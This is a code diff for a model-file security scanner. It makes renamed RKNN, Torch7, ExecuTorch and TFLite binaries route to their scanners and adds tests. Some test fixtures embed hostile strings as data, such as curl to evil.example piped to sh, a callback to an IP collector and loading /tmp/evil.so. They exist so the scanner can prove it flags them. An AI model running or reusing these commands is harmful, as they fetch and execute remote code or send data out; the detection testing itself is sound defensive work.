_allows_renamed_binary_content_route(file_path: Path | None) -> bool: + return file_path is None or file_path.suffix.lower() not in _RENAMED_BINARY_CONTENT_ROUTE_BLOCKED_EXTENSIONS + + +def detect_pytorch_binary_supplemental_format(path: str) -> str | None: + """Return a strict secondary scanner for a content-identified `.bin` file.""" + file_path = Path(path) + if file_path.suffix.lower() != ".bin" or not file_path.is_file(): + return None + + try: + size = file_path.stat().st_size + if size < 4: + return None + prefix = read_magic_bytes(path, max(_TORCH7_SIGNATURE_READ_BYTES, 8)) + except OSError: + return None + + magic4 = prefix[:4] + magic8 = prefix[:8] + if magic4 == b"RKNN": + return "rknn" + if _is_torch7_signature(prefix): + return "torch7" + if _detect_executorch_content_route(file_path, magic8) == "executorch": + return "executorch" + if _looks_like_tflite_header(magic8): + return "tflite" + return None + + def _looks_like_safetensors_structure(path: Path | None, magic8: bytes, file_size: int) -> bool: """Validate safetensors framing: .""" if file_size <= 8 or len(magic8) < 8: @@ -1802,7 +1854,7 @@ def _is_executorch_binary_signature(prefix: bytes) -> bool: return len(prefix) >= 8 and prefix[4:6] == b"ET" and prefix[6:8].isdigit() -def _is_valid_executorch_binary(path: str | Path) -> bool: +def _is_valid_executorch_binary(path: str | Path, *, propagate_io_errors: bool = False) -> bool: """Validate the minimal FlatBuffers structure for ExecuTorch binaries.""" file_path = Path(path) if not file_path.is_file(): @@ -1847,12 +1899,28 @@ def _is_valid_executorch_binary(path: str | Path) -> bool: return False if root_table_offset + object_size > file_size: return False - except (OSError, struct.error): + except OSError: + if propagate_io_errors: + raise + return False + except struct.error: return False return True +def _detect_executorch_content_route(file_path: Path, magic8: bytes) -> str | None: + """Preserve signature-valid candidates when structure probing cannot complete.""" + if not _is_executorch_binary_signature(magic8): + return None + try: + if _is_valid_executorch_binary(file_path, propagate_io_errors=True): + return "executorch" + except OSError: + return "executorch" + return None + + def _detect_compression_format(prefix: bytes) -> str | None: if prefix.startswith(_GZIP_MAGIC): return "gzip" @@ -1879,9 +1947,9 @@ def detect_format_from_magic_bytes( match magic4: case b"CBM1": return "catboost" - case b"RKNN": + case b"RKNN" if _allows_renamed_binary_content_route(file_path): return "rknn" - case b"T7\x00\x00": + case b"T7\x00\x00" if _allows_renamed_binary_content_route(file_path): return "torch7" case b"GGUF": return "gguf" @@ -1962,12 +2030,6 @@ def detect_file_format_from_magic(path: str) -> str: magic8 = header[:8] magic16 = header[:16] - if _looks_like_tflite_header(magic8): - return "tflite" - - if _is_executorch_binary_signature(magic8) and _is_valid_executorch_binary(file_path): - return "executorch" - llamafile_format = _detect_llamafile_route_format(file_path, magic4) if llamafile_format is not None: return llamafile_format @@ -1994,7 +2056,7 @@ def detect_file_format_from_magic(path: str) -> str: f.seek(0) torch7_prefix = f.read(_TORCH7_SIGNATURE_READ_BYTES) - if _is_torch7_signature(torch7_prefix): + if _allows_renamed_binary_content_route(file_path) and _is_torch7_signature(torch7_prefix): return "torch7" # CNTKv2 has protobuf-style serialization without a fixed first-8-byte magic. @@ -2017,6 +2079,16 @@ def detect_file_format_from_magic(path: str) -> str: if xgboost_route is not None: return xgboost_route + if ( + _allows_renamed_binary_content_route(file_path) + and _detect_executorch_content_route(file_path, magic8) == "executorch" + ): + return "executorch" + if file_path.suffix.lower() not in _TFLITE_CONTENT_ROUTE_BLOCKED_EXTENSIONS and _looks_like_tflite_header( + magic8 + ): + return "tflite" + # Check for XML-based formats (OpenVINO and PMML) using the first # structural root tag rather than a short raw-byte substring. if _could_be_xml_prefix(header): @@ -2036,15 +2108,15 @@ def detect_file_format_from_magic(path: str) -> str: magic4 = header[:4] magic8 = header[:8] - if _looks_like_tflite_header(magic8): - return "tflite" - if _looks_like_safetensors_structure(file_path, magic8, size): return "safetensors" if _looks_like_onnx_model_candidate_file(file_path, size, magic4): return "onnx" + if file_path.suffix.lower() not in _TFLITE_CONTENT_ROUTE_BLOCKED_EXTENSIONS and _looks_like_tflite_header(magic8): + return "tflite" + return "unknown" @@ -2116,10 +2188,6 @@ def detect_file_format_for_skip_filter(path: str) -> str: if _looks_like_uncompressed_tar_header(prefix): return _detect_tar_route(path) or "tar" - if _looks_like_tflite_header(magic8): - return "tflite" - if _is_executorch_binary_signature(magic8) and _is_valid_executorch_binary(file_path): - return "executorch" llamafile_format = _detect_llamafile_route_format(file_path, magic4) if llamafile_format is not None: return llamafile_format @@ -2147,7 +2215,7 @@ def detect_file_format_for_skip_filter(path: str) -> str: torch7_probe_size = min(size, _TORCH7_SIGNATURE_READ_BYTES) if len(prefix) < torch7_probe_size: prefix += f.read(torch7_probe_size - len(prefix)) - if _is_torch7_signature(prefix): + if _allows_renamed_binary_content_route(file_path) and _is_torch7_signature(prefix): return "torch7" cntk_probe_size = min(size, _CNTK_SIGNATURE_READ_BYTES) @@ -2170,6 +2238,16 @@ def detect_file_format_for_skip_filter(path: str) -> str: if xgboost_route is not None: return xgboost_route + if ( + _allows_renamed_binary_content_route(file_path) + and _detect_executorch_content_route(file_path, magic8) == "executorch" + ): + return "executorch" + if file_path.suffix.lower() not in _TFLITE_CONTENT_ROUTE_BLOCKED_EXTENSIONS and _looks_like_tflite_header( + magic8 + ): + return "tflite" + if _could_be_xml_prefix(prefix): xml_probe_size = min(size, _XML_MODEL_SIGNATURE_READ_BYTES) if len(prefix) < xml_probe_size: @@ -2305,7 +2383,7 @@ def detect_file_format(path: str) -> str: return "safetensors" torch7_prefix = read_magic_bytes(path, _TORCH7_SIGNATURE_READ_BYTES) - if _is_torch7_signature(torch7_prefix): + if _allows_renamed_binary_content_route(file_path) and _is_torch7_signature(torch7_prefix): return "torch7" signature_prefix = read_magic_bytes(path, max(_CNTK_SIGNATURE_READ_BYTES, _LIGHTGBM_SIGNATURE_READ_BYTES)) @@ -2314,11 +2392,16 @@ def detect_file_format(path: str) -> str: if _is_content_routed_lightgbm_signature(signature_prefix[:_LIGHTGBM_SIGNATURE_READ_BYTES]): return "lightgbm" + if ext == "": + xgboost_route = _detect_extensionless_xgboost_ubjson_route( + read_magic_bytes(path, min(size, _XGBOOST_UBJSON_ROUTE_READ_BYTES)) + ) + if xgboost_route is not None: + return xgboost_route + # For .bin files, do more sophisticated detection if ext == ".bin": magic64 = read_magic_bytes(path, 64) - if _looks_like_tflite_header(magic8): - return "tflite" # IMPORTANT: Check ZIP format first (PyTorch models saved with torch.save()) if _has_zip_magic(magic4): return "zip" @@ -2346,6 +2429,16 @@ def detect_file_format(path: str) -> str: # Otherwise, assume raw binary format (PyTorch weights) return "pytorch_binary" + if ( + _allows_renamed_binary_content_route(file_path) + and _detect_executorch_content_route(file_path, magic8) == "executorch" + ): + return "executorch" + if _allows_renamed_binary_content_route(file_path) and magic4 == b"RKNN": + return "rknn" + if ext not in _TFLITE_CONTENT_ROUTE_BLOCKED_EXTENSIONS and _looks_like_tflite_header(magic8): + return "tflite" + # Extension-based detection for non-.bin files # For .pt/.pth/.ckpt files, check if they're ZIP format first if ext in (".pt", ".pth", ".ckpt"): @@ -2444,12 +2537,6 @@ def detect_file_format(path: str) -> str: ".txz", ): return "tar" - if ext == "": - xgboost_route = _detect_extensionless_xgboost_ubjson_route( - read_magic_bytes(path, min(size, _XGBOOST_UBJSON_ROUTE_READ_BYTES)) - ) - if xgboost_route is not None: - return xgboost_route if _looks_like_safetensors_structure(file_path, magic8, size): return "safetensors" return "unknown" @@ -2519,7 +2606,6 @@ def validate_file_type_with_formats(path: str, header_format: str, ext_format: s if ext_format == "pytorch_binary" and header_format in { "pytorch_binary", "pickle", - "tflite", "zip", "unknown", # .bin files can contain arbitrary binary data }: diff --git a/tests/scanners/test_executorch_scanner.py b/tests/scanners/test_executorch_scanner.py index 8ac44c3f5..c601be4db 100644 --- a/tests/scanners/test_executorch_scanner.py +++ b/tests/scanners/test_executorch_scanner.py @@ -4,14 +4,17 @@ import pytest -from modelaudit.scanners.base import IssueSeverity +from modelaudit import core +from modelaudit.cache import get_cache_manager, reset_cache_manager +from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, IssueSeverity from modelaudit.scanners.executorch_scanner import ExecuTorchScanner +from modelaudit.utils.file.detection import detect_file_format _ASSETS_DIR = Path(__file__).resolve().parents[1] / "assets" -def create_executorch_binary(tmp_path: Path, *, identifier: bytes = b"ET12") -> Path: - binary_path = tmp_path / "program.pte" +def create_executorch_binary(tmp_path: Path, *, identifier: bytes = b"ET12", filename: str = "program.pte") -> Path: + binary_path = tmp_path / filename # Minimal valid FlatBuffer with the ExecuTorch file identifier. binary_path.write_bytes(b"\x0c\x00\x00\x00" + identifier + b"\x04\x00\x04\x00\x04\x00\x00\x00") return binary_path @@ -88,6 +91,144 @@ def test_executorch_scanner_accepts_versioned_binary_program_header(tmp_path: Pa assert not result.issues +def test_executorch_header_read_failure_is_inconclusive_not_security_finding( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, +) -> None: + file_path = create_executorch_binary(tmp_path) + + def raise_os_error(_path: str, length: int = 4) -> bytes: + raise OSError(f"simulated ExecuTorch header read failure at {length} bytes") + + monkeypatch.setattr(ExecuTorchScanner, "_read_header", staticmethod(raise_os_error)) + + direct = ExecuTorchScanner().scan(str(file_path)) + monkeypatch.setattr(ExecuTorchScanner, "can_handle", classmethod(lambda _cls, _path: True)) + aggregate = core.scan_model_directory_or_file(str(file_path), cache_scan_results=False) + + assert direct.success is False + assert direct.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME + assert "executorch_read_failed" in direct.metadata.get("scan_outcome_reasons", []) + assert any( + check.name == "ExecuTorch File Read" + and "Unable to read ExecuTorch content" in check.message + and check.severity == IssueSeverity.INFO + and check.details.get("scan_outcome_reason") == "executorch_read_failed" + for check in direct.checks + ) + assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in aggregate.issues) + assert aggregate.file_metadata[str(file_path)].get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME + assert core.determine_exit_code(aggregate) == 2 + + +def test_executorch_read_failure_result_is_not_cached( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, +) -> None: + file_path = create_executorch_binary(tmp_path) + cache_dir = tmp_path / "cache" + + def raise_os_error(_path: str, length: int = 4) -> bytes: + raise OSError(f"simulated ExecuTorch header read failure at {length} bytes") + + monkeypatch.setattr(ExecuTorchScanner, "_read_header", staticmethod(raise_os_error)) + monkeypatch.setattr(ExecuTorchScanner, "can_handle", classmethod(lambda _cls, _path: True)) + + reset_cache_manager() + try: + first = core.scan_model_directory_or_file( + str(file_path), + cache_enabled=True, + cache_dir=str(cache_dir), + min_cache_file_size=0, + ) + second = core.scan_model_directory_or_file( + str(file_path), + cache_enabled=True, + cache_dir=str(cache_dir), + min_cache_file_size=0, + ) + + for aggregate in (first, second): + metadata = aggregate.file_metadata[str(file_path)] + assert aggregate.success is False + assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert "executorch_read_failed" in metadata["scan_outcome_reasons"] + assert any("Unable to read ExecuTorch content" in issue.message for issue in aggregate.issues) + assert core.determine_exit_code(aggregate) == 2 + assert get_cache_manager(str(cache_dir), enabled=True).get_stats()["total_entries"] == 0 + finally: + reset_cache_manager() + + +def test_executorch_structure_read_failure_is_inconclusive_not_security_finding( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, +) -> None: + file_path = create_executorch_binary(tmp_path) + + def raise_os_error(_path: str, *, propagate_io_errors: bool = False) -> bool: + assert propagate_io_errors is True + raise OSError("simulated ExecuTorch structure read failure") + + monkeypatch.setattr("modelaudit.scanners.executorch_scanner._is_valid_executorch_binary", raise_os_error) + + result = ExecuTorchScanner().scan(str(file_path)) + + assert result.success is False + assert result.metadata.get("scan_outcome") == INCONCLUSIVE_SCAN_OUTCOME + assert "executorch_read_failed" in result.metadata.get("scan_outcome_reasons", []) + assert not any(issue.severity in {IssueSeverity.WARNING, IssueSeverity.CRITICAL} for issue in result.issues) + + +def test_renamed_executorch_binary_routes_through_directory_scan(tmp_path: Path) -> None: + file_path = create_executorch_binary(tmp_path, filename="program.jpg") + + assert ExecuTorchScanner.can_handle(str(file_path)) + assert detect_file_format(str(file_path)) == "executorch" + assert core.scan_file(str(file_path)).scanner_name == "executorch" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 1 + assert "executorch" in directory.scanner_names + + +def test_renamed_executorch_structure_read_failure_routes_to_inconclusive_scan( + tmp_path: Path, + monkeypatch: pytest.MonkeyPatch, +) -> None: + file_path = create_executorch_binary(tmp_path, filename="program.jpg") + + def fail_structural_probe(_path: str | Path, *, propagate_io_errors: bool = False) -> bool: + if propagate_io_errors: + raise OSError("simulated renamed ExecuTorch structure read failure") + return False + + monkeypatch.setattr("modelaudit.utils.file.detection._is_valid_executorch_binary", fail_structural_probe) + monkeypatch.setattr("modelaudit.scanners.executorch_scanner._is_valid_executorch_binary", fail_structural_probe) + + assert detect_file_format(str(file_path)) == "executorch" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + metadata = directory.file_metadata[str(file_path)] + + assert directory.files_scanned == 1 + assert "executorch" in directory.scanner_names + assert metadata["scan_outcome"] == INCONCLUSIVE_SCAN_OUTCOME + assert "executorch_read_failed" in metadata["scan_outcome_reasons"] + assert core.determine_exit_code(directory) == 2 + + +def test_renamed_executorch_near_match_remains_skipped(tmp_path: Path) -> None: + file_path = create_executorch_binary(tmp_path, identifier=b"ETXX", filename="program.jpg") + + assert not ExecuTorchScanner.can_handle(str(file_path)) + assert detect_file_format(str(file_path)) == "unknown" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 0 + + def test_executorch_scanner_rejects_invalid_binary_signature_match(tmp_path: Path) -> None: file_path = tmp_path / "fake-program.pte" file_path.write_bytes(b"JUNKET12notflatbufferatall") @@ -112,6 +253,17 @@ def test_executorch_scanner_scans_polyglot_binary_zip_payload(tmp_path: Path) -> assert any(issue.rule_code == "S104" for issue in result.issues) +def test_executorch_scanner_scans_stubbed_zip_payload(tmp_path: Path) -> None: + file_path = create_executorch_archive(tmp_path, malicious=True) + file_path.write_bytes(b"launcher-stub" + file_path.read_bytes()) + + assert zipfile.is_zipfile(file_path) + + result = ExecuTorchScanner().scan(str(file_path)) + + assert any(issue.severity == IssueSeverity.CRITICAL and "eval" in issue.message.lower() for issue in result.issues) + + def test_executorch_scanner_preserves_legacy_pickle_rule_codes_for_embedded_members(tmp_path: Path) -> None: fixture_path = _ASSETS_DIR / "samples" / "pickles" / "decode_exec_chain.pkl" model_path = tmp_path / "decode_exec_chain.ptl" diff --git a/tests/scanners/test_pytorch_binary_scanner.py b/tests/scanners/test_pytorch_binary_scanner.py index 3a4fc0edf..9579251ae 100644 --- a/tests/scanners/test_pytorch_binary_scanner.py +++ b/tests/scanners/test_pytorch_binary_scanner.py @@ -180,6 +180,46 @@ def test_pytorch_binary_scanner_no_false_positive_mz(tmp_path): assert not found_pe, "Should NOT detect Windows executable when MZ is in middle of file" +def test_pytorch_binary_scanner_detects_structurally_valid_embedded_pe(tmp_path: Path) -> None: + scanner = PyTorchBinaryScanner() + binary_file = tmp_path / "embedded_pe.bin" + pe_payload = bytearray(b"\x00" * 196) + pe_payload[:2] = b"MZ" + pe_payload[0x3C:0x40] = (0x80).to_bytes(4, "little") + pe_payload[0x80:0x84] = b"PE\x00\x00" + binary_file.write_bytes(b"\x00" * 512 + bytes(pe_payload)) + + result = scanner.scan(str(binary_file)) + + assert any( + issue.rule_code == "S501" + and "Windows executable" in issue.message + and "(offset: 512)" in (issue.location or "") + for issue in result.issues + ) + + +def test_pytorch_binary_scanner_detects_embedded_pe_across_chunk_boundary(tmp_path: Path) -> None: + scanner = PyTorchBinaryScanner() + binary_file = tmp_path / "boundary_embedded_pe.bin" + chunk_size = 1024 * 1024 + pe_offset = chunk_size - 0x50 + pe_payload = bytearray(b"\x00" * (chunk_size + 0x80)) + pe_payload[pe_offset : pe_offset + 2] = b"MZ" + pe_payload[pe_offset + 0x3C : pe_offset + 0x40] = (0x80).to_bytes(4, "little") + pe_payload[pe_offset + 0x80 : pe_offset + 0x84] = b"PE\x00\x00" + binary_file.write_bytes(pe_payload) + + result = scanner.scan(str(binary_file)) + + assert any( + issue.rule_code == "S501" + and "Windows executable" in issue.message + and f"(offset: {pe_offset})" in (issue.location or "") + for issue in result.issues + ) + + @pytest.mark.skip( reason="ML context filtering now ignores executable signatures in weight-like data to reduce false positives" ) diff --git a/tests/scanners/test_rknn_scanner.py b/tests/scanners/test_rknn_scanner.py index 0e1670879..afbad0234 100644 --- a/tests/scanners/test_rknn_scanner.py +++ b/tests/scanners/test_rknn_scanner.py @@ -10,6 +10,7 @@ from modelaudit.cache import get_cache_manager, reset_cache_manager from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, CheckStatus, IssueSeverity from modelaudit.scanners.rknn_scanner import RknnScanner +from modelaudit.utils.file.detection import detect_file_format def _write_rknn_file(tmp_path: Path, payload: bytes, filename: str = "model.rknn") -> Path: @@ -238,6 +239,36 @@ def test_regression_rknn_routes_to_dedicated_scanner(tmp_path: Path) -> None: assert result.scanner_name != "unknown" +def test_renamed_rknn_routes_and_detects_correlated_indicators(tmp_path: Path) -> None: + payload = ( + b"RKNN\x01\x00\x00\x00" + b"notes=cmd.exe /c curl https://evil.example/payload\n" + b"callback=http://198.51.100.5:8080/collect\n" + ) + path = _write_rknn_file(tmp_path, payload, filename="payload.jpg") + + assert RknnScanner.can_handle(str(path)) + assert detect_file_format(str(path)) == "rknn" + + direct = core.scan_file(str(path)) + assert direct.scanner_name == "rknn" + assert any(check.severity == IssueSeverity.CRITICAL for check in direct.checks) + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 1 + assert "rknn" in directory.scanner_names + + +def test_renamed_rknn_near_match_remains_skipped(tmp_path: Path) -> None: + path = _write_rknn_file(tmp_path, b"RKNX\x01\x00\x00\x00model_name=demo\n", filename="notes.jpg") + + assert not RknnScanner.can_handle(str(path)) + assert detect_file_format(str(path)) == "unknown" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 0 + + def test_false_positive_high_entropy_blob_is_not_critical(tmp_path: Path) -> None: high_entropy_like = b"A" * 220 + b"\nmetadata=benchmark\n" path = _write_rknn_file(tmp_path, b"RKNN\x01\x00\x00\x00" + high_entropy_like, filename="entropy.rknn") diff --git a/tests/scanners/test_tflite_scanner.py b/tests/scanners/test_tflite_scanner.py index cb75fb355..57568b20e 100644 --- a/tests/scanners/test_tflite_scanner.py +++ b/tests/scanners/test_tflite_scanner.py @@ -11,6 +11,7 @@ from modelaudit.scanners import _registry from modelaudit.scanners.base import INCONCLUSIVE_SCAN_OUTCOME, IssueSeverity from modelaudit.scanners.tflite_scanner import _MAX_COUNT, TFLiteScanner +from modelaudit.utils.file.detection import detect_file_format HAS_TFLITE = importlib.util.find_spec("tflite") is not None @@ -53,28 +54,100 @@ def test_tflite_scanner_cannot_handle_wrong_extension(tmp_path: Path) -> None: def test_tflite_scanner_can_handle_renamed_model_by_magic_bytes(tmp_path: Path) -> None: """Valid TFLite content should still route when the extension is changed.""" - path = tmp_path / "model.bin" + path = tmp_path / "model.jpg" path.write_bytes(b"\x00\x00\x00\x00TFL3" + b"\x00" * 100) assert TFLiteScanner.can_handle(str(path)) is True def test_tflite_scanner_registry_routes_renamed_model_by_magic_bytes(tmp_path: Path) -> None: - """Registry extension prefiltering should still route renamed TFLite binaries by magic bytes.""" - path = tmp_path / "model.bin" + """Registry fallback should still route renamed TFLite binaries by magic bytes.""" + path = tmp_path / "model.jpg" path.write_bytes(b"\x00\x00\x00\x00TFL3" + b"\x00" * 100) assert _registry.get_scanner_for_path(str(path)) is TFLiteScanner -def test_core_scan_file_routes_renamed_tflite_bin_to_tflite_scanner(tmp_path: Path) -> None: - """End-to-end routing should prefer TFLite over PyTorch binary when `.bin` magic bytes are `TFL3`.""" +def test_core_scan_file_preserves_tflite_bin_analysis_with_pytorch_binary_primary(tmp_path: Path) -> None: + """`.bin` retains raw analysis while a strict TFLite signature is still analyzed.""" path = tmp_path / "model.bin" path.write_bytes(b"\x00\x00\x00\x00TFL3" + b"\x00" * 100) - result = core.scan_file(str(path)) + with patch("modelaudit.scanners.tflite_scanner.HAS_TFLITE", False): + result = core.scan_file(str(path), config={"cache_scan_results": False}) + + assert TFLiteScanner.can_handle(str(path)) is False + assert detect_file_format(str(path)) == "pytorch_binary" + assert result.scanner_name == "pytorch_binary" + assert result.metadata["supplemental_scanners"] == ["tflite"] + assert "tflite_dependency_unavailable" in result.metadata["scan_outcome_reasons"] + assert result.success is False + + +def test_renamed_tflite_with_skipped_suffix_routes_through_directory_scan(tmp_path: Path) -> None: + path = tmp_path / "model.jpg" + path.write_bytes(b"\x0c\x00\x00\x00TFL3" + b"\x00" * 100) + + assert TFLiteScanner.can_handle(str(path)) + assert detect_file_format(str(path)) == "tflite" + assert core.scan_file(str(path)).scanner_name == "tflite" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 1 + assert "tflite" in directory.scanner_names + + +def test_extensionless_tflite_routes_through_directory_scan(tmp_path: Path) -> None: + path = tmp_path / "model" + path.write_bytes(b"\x0c\x00\x00\x00TFL3" + b"\x00" * 100) + + assert TFLiteScanner.can_handle(str(path)) + assert detect_file_format(str(path)) == "tflite" + assert core.scan_file(str(path)).scanner_name == "tflite" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 1 + assert "tflite" in directory.scanner_names + + +def test_renamed_tflite_near_match_with_skipped_suffix_remains_skipped(tmp_path: Path) -> None: + path = tmp_path / "notes.jpg" + path.write_bytes(b"\x0c\x00\x00\x00XTFL3" + b"\x00" * 100) + + assert not TFLiteScanner.can_handle(str(path)) + assert detect_file_format(str(path)) == "unknown" + + directory = core.scan_model_directory_or_file(str(tmp_path), cache_scan_results=False) + assert directory.files_scanned == 0 + + +@pytest.mark.parametrize( + ("payload", "expected_format"), + [ + (b"PK\x03\x04TFL3" + b"\x00" * 32, "zip"), + (b"\x1f\x8b\x08\x00TFL3" + b"\x00" * 32, "gzip"), + (b"((S'TFL3'\ntt.", "pickle"), + (b"RKNNTFL3" + b"\x00" * 32, "rknn"), + (b"T7\x00\x00TFL3" + b"\x00" * 32, "torch7"), + ], +) +def test_tflite_identifier_does_not_override_stronger_content_routes( + tmp_path: Path, + payload: bytes, + expected_format: str, +) -> None: + path = tmp_path / "payload.jpg" + path.write_bytes(payload) + + assert detect_file_format(str(path)) == expected_format + + +@pytest.mark.parametrize("suffix", [".dnn", ".rknn", ".t7", ".th", ".exe", ".llamafile"]) +def test_tflite_identifier_does_not_override_owned_format_extensions(tmp_path: Path, suffix: str) -> None: + path = tmp_path / f"payload{suffix}" + path.write_bytes(b"MZ\x00\x00TFL3llamafile runtime\n" if suffix in {".exe", ".llamafile"} else b"T7\x00\x00TFL3") - assert result.scanner_name == "tflite" + assert detect_file_format(str(path)) != "tflite" def test_tflite_scanner_can_handle_magic_near_match_requires_exact_offset(tmp_path: Path) -> None: diff --git a/tests/scanners/test_zip_scanner.py b/tests/scanners/test_zip_scanner.py index 969de4f00..7a3aa5c63 100644 --- a/tests/scanners/test_zip_scanner.py +++ b/tests/scanners/test_zip_scanner.py @@ -928,6 +928,42 @@ def test_scan_nested_file_fails_closed_when_xml_root_is_beyond_bounded_probe(tmp assert "bounded probe ended before the first structural root element" in check.message +def test_scan_nested_file_merges_torch7_security_analysis_for_signature_valid_bin(tmp_path: Path) -> None: + extracted_member = tmp_path / "payload.bin" + extracted_member.write_bytes( + b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('curl https://evil.example/payload.sh | sh')\n" + ) + + result = scan_nested_file(str(extracted_member), {"cache_enabled": False}) + + assert result.scanner_name == "pytorch_binary" + assert result.metadata["supplemental_scanners"] == ["torch7"] + assert any( + check.name == "Torch7 Lua Execution Primitive Analysis" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + +def test_scan_nested_file_routes_torch7_bin_when_raw_scanner_is_suppressed(tmp_path: Path) -> None: + extracted_member = tmp_path / "payload.bin" + extracted_member.write_bytes( + b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('curl https://evil.example/payload.sh | sh')\n" + ) + + result = scan_nested_file(str(extracted_member), {"scanners": ["torch7"], "cache_enabled": False}) + + assert result.scanner_name == "torch7" + assert "pytorch_binary" in result.metadata["skipped_scanner_ids"] + assert any( + check.name == "Torch7 Lua Execution Primitive Analysis" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + def test_scan_nested_file_routes_renamed_mxnet_symbol_by_structure(tmp_path: Path) -> None: extracted_member = create_mock_mxnet_symbol(tmp_path / "payload.dat", custom_library="../../tmp/libevil.so") diff --git a/tests/test_core.py b/tests/test_core.py index 3c9770b42..00402ac4c 100644 --- a/tests/test_core.py +++ b/tests/test_core.py @@ -1875,6 +1875,121 @@ def test_scan_file_routes_raw_bin_without_zip_structure_to_pytorch_binary(tmp_pa assert result.success is True +@pytest.mark.parametrize( + ("payload", "supplemental_scanner"), + [ + (b"RKNN\x01\x00\x00\x00payload" + b"\x7fELF" + b"\x00" * 128, "rknn"), + (b"T7\x00\x00payload torch.FloatTensor nn.Sequential " + b"\x7fELF" + b"\x00" * 128, "torch7"), + (b"\x0c\x00\x00\x00ET13\x04\x00\x04\x00\x04\x00\x00\x00" + b"\x7fELF" + b"\x00" * 128, "executorch"), + ], + ids=["rknn", "torch7", "executorch"], +) +def test_scan_file_preserves_bin_executable_detection_when_prefix_looks_like_other_format( + tmp_path: Path, + payload: bytes, + supplemental_scanner: str, +) -> None: + model_path = tmp_path / "weights.bin" + model_path.write_bytes(payload) + + result = scan_file(str(model_path), config={"cache_scan_results": False}) + + assert file_detection.detect_file_format(str(model_path)) == "pytorch_binary" + assert result.scanner_name == "pytorch_binary" + assert result.metadata["supplemental_scanners"] == [supplemental_scanner] + assert any("Linux executable" in issue.message for issue in result.issues) + + +def test_scan_file_merges_torch7_security_analysis_for_signature_valid_bin(tmp_path: Path) -> None: + model_path = tmp_path / "payload.bin" + model_path.write_bytes( + b"T7\x00\x00torch.FloatTensor nn.Sequential\n" + b"cmd = os.execute('curl https://evil.example/payload.sh | sh')\n" + b"local lib = package.loadlib('/tmp/evil.so', 'run')\n" + b"\x7fELF" + b"\x00" * 128 + ) + + result = scan_file(str(model_path), config={"cache_scan_results": False}) + + assert result.scanner_name == "pytorch_binary" + assert result.metadata["supplemental_scanners"] == ["torch7"] + assert any("Linux executable" in issue.message for issue in result.issues) + assert any( + check.name == "Torch7 Lua Execution Primitive Analysis" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + +@pytest.mark.parametrize( + "selection_config", + [ + {"exclude_scanners": ["pytorch_binary"]}, + {"scanners": ["torch7"]}, + ], + ids=["pytorch-binary-excluded", "torch7-only"], +) +def test_scan_file_routes_malicious_torch7_bin_when_raw_scanner_is_suppressed( + tmp_path: Path, + selection_config: dict[str, list[str]], +) -> None: + model_path = tmp_path / "payload.bin" + model_path.write_bytes( + b"T7\x00\x00torch.FloatTensor nn.Sequential\ncmd = os.execute('curl https://evil.example/payload.sh | sh')\n" + ) + + result = scan_file( + str(model_path), + config={**selection_config, "cache_scan_results": False}, + ) + + assert result.scanner_name == "torch7" + assert any( + check.name == "Scanner Selection" and check.details.get("skipped_scanner_id") == "pytorch_binary" + for check in result.checks + ) + assert any( + check.name == "Torch7 Lua Execution Primitive Analysis" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + +def test_scan_file_merges_rknn_security_analysis_for_signature_valid_bin(tmp_path: Path) -> None: + model_path = tmp_path / "payload.bin" + model_path.write_bytes( + b"RKNN\x01\x00\x00\x00" + b"notes=cmd.exe /c curl https://evil.example/payload\n" + b"callback=http://198.51.100.5:8080/collect\n" + ) + + result = scan_file(str(model_path), config={"cache_scan_results": False}) + + assert result.scanner_name == "pytorch_binary" + assert result.metadata["supplemental_scanners"] == ["rknn"] + assert any( + check.name == "RKNN Command and Network Indicator Correlation" + and check.status == CheckStatus.FAILED + and check.severity == IssueSeverity.CRITICAL + for check in result.checks + ) + + +def test_scan_file_merges_executorch_archive_analysis_for_signature_valid_bin(tmp_path: Path) -> None: + model_path = tmp_path / "program.bin" + model_path.write_bytes(b"\x0c\x00\x00\x00ET13\x04\x00\x04\x00\x04\x00\x00\x00") + with zipfile.ZipFile(model_path, "a") as archive: + archive.writestr("evil.py", "print('evil')") + + result = scan_file(str(model_path), config={"cache_scan_results": False}) + + assert result.scanner_name == "pytorch_binary" + assert result.metadata["supplemental_scanners"] == ["executorch"] + assert any(issue.rule_code == "S104" and "evil.py" in (issue.location or "") for issue in result.issues) + + def test_preferred_scanner_does_not_route_generic_zip_bin_to_pickle(tmp_path: Path) -> None: model_path = tmp_path / "weights.bin" _create_misnamed_zip(model_path, {"metadata.txt": b"not a pickle"}) diff --git a/tests/utils/file/test_filetype.py b/tests/utils/file/test_filetype.py index 72667f27a..e53d2967d 100644 --- a/tests/utils/file/test_filetype.py +++ b/tests/utils/file/test_filetype.py @@ -1069,6 +1069,28 @@ def test_detect_rknn_format_by_signature(tmp_path: Path) -> None: assert validate_file_type(str(bad_rknn)) is False +@pytest.mark.parametrize( + ("filename", "payload", "expected_format"), + [ + ("prefixed.pb", b"RKNN\x01\x00\x00\x00protobuf-ish payload", "protobuf"), + 